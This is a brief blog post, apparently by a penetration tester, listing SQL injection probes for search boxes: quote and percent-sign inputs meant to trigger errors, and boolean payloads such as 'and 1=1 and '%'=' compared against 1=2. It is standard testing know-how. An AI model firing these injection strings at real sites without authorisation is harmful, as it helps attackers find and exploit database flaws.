congdong007

Penetration Test、Software Developer

0%

Search-Based SQL Injection Detection

Posted on Edited on In , , ,

Search-Based Injection Detection Methods:

  1. Input the search keyword: 

    1
    keyword'

    If an error occurs, there’s a high probability of a vulnerability.

  2. Input the search keyword: 

    1
    keyword%'

    If an error occurs, there’s a high probability of a vulnerability.

  3. Input the search keyword: 

    1
    keyword% 'and 1=1 and '%'='

    Observe the response.

  4. Input the search keyword: 

    1
    keyword% 'and 1=2 and '%'='

    Observe the response.

Search-Based Injection Detection Statements:

1
2
3
'and 1=1 and '%'='
%' and 1=1--'
%' and 1=1 and '%'='